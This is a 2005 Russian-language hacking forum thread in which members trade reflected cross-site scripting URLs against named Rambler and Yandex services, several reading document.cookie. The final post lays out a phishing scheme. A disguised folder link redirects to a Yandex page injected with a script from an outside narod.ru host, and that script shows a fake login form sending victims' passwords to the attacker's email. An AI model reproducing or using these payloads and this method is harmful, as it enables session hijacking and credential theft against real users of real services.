Xss в Rambler.ru и Yandex.ru

Discussion in 'Уязвимости' started by vectorg, 8 Oct 2005.

  1. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    http://finance.rambler.ru/db/chain.html?type=fix&chain_id=<script>alert(document.cookie)</script>

    =)
     
    #1 vectorg, 8 Oct 2005
    Last edited: 8 Oct 2005
  2. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Круто
     
  3. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    ещё как! ;)
     
  4. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Да, там много чего есть. Вот ещё несколько со старых запасов:
    Code:
     http://horoscopes.rambler.ru/index.html?sign='"><script>alert('1')</script>libra&horo='"><script>alert('2')</script>2&year='"><script>alert('3')</script> 
    Code:
    http://www.rambler.ru/db/news/msg.html?mid='"><script>alert('CoolPinkPanther')</script>
     
    1 person likes this.
  5. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    круто!

    вот только счас нашёл на яндексе =)

    http://cards.yandex.ru/theme.xhtml?topic="><script>alert(document.cookie)</script>

    блин сколько их там!?
     
  6. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Продолжая тему яндекса, скажу что их там много, даже очень!!!Вот опять же из старого:
    Code:
    http://news.yandex.ru/yandsearch?stype='"><script>alert()</script>
     
  7. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    их бесчисленное количество так как это ненужные баги)
     
  8. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    в некоторых случиях очень даже нужные, например та что я нашёл на народ.ру

    с помощью СИ можно будет достать пассы от yandex.ru...
     
  9. w00d

    w00d [ The Godfather ]

    Joined:
    30 Jun 2005
    Messages:
    172
    Likes Received:
    22
    Reputations:
    4
    Поподробней и поконкретней.
    Что есть пассы от yandex.ru?
    и каким образом их можно достать с помощью народа? :)
     
  10. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    все вопросы в асю... :)
     
  11. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    рассказывай тут)
     
  12. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    На всех проектах Яндекса используются одни куки.
     
  13. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    короче смысл такой:

    создаём сайт на народе... делаем папку под названиваем foto.jpg пихаем в неё страницу страницу index.html с перенаправлением на [http://narod.yandex.ru/100.xhtml?entermatrix.narod.ru"><script/**/src="http://entermatrix.narod.ru/foto.js"></script>]
    создаём анкету с 2-мя полями, в [http://entermatrix.narod.ru/foto.js] прописываем код этих полей, перед ними пишем логин и пароль...

    всё!

    теперь заходим например на чат на народе, даём какому нибудь челу ссыку на свою фоту

    например ***.narod.ru/foto.jpg

    т.к. это папка она открывает index.html, идёт перенаправление на страницу народа с моей xss в которой с помощью foto.js и прописаннными в ней формами (document.write), пишется типо введите ваш логин и пароль чтобы скачать фоту... данные отсылаются на твоё мыло прописанное при создании "анкеты", можно ещё сделать так, чтоб при нажатии кнопки перенаправляло на какуюнить картинку, можно даже фотку =)

    вот и всё...

    конечно же всё расчитано на ламера, хотя многие не смотрят на адрес страницы...
     
    1 person likes this.